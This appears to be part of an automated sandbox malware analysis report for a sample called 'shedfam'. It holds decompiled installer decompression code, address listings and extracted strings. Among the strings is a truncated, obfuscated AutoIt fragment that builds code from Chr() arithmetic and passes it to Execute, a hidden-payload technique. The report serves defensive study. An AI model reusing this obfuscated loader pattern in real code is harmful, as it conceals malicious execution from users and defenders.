								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406194
0x0040619b
0x004061a1
0x004061a7
0x00000000
0x004061ab
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061cd
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e2
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x0040622d
0x00406230
0x00406258
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406232
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624a
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a1
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062a6
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c3
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x00406309
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b1
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069e7
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a0f
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x004063a3
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406bb9
0x00406bbf
0x00406bc1
0x00406bc8
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000

Strings

Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 0040618E

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
API String ID: 0-3096212848
Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004058db
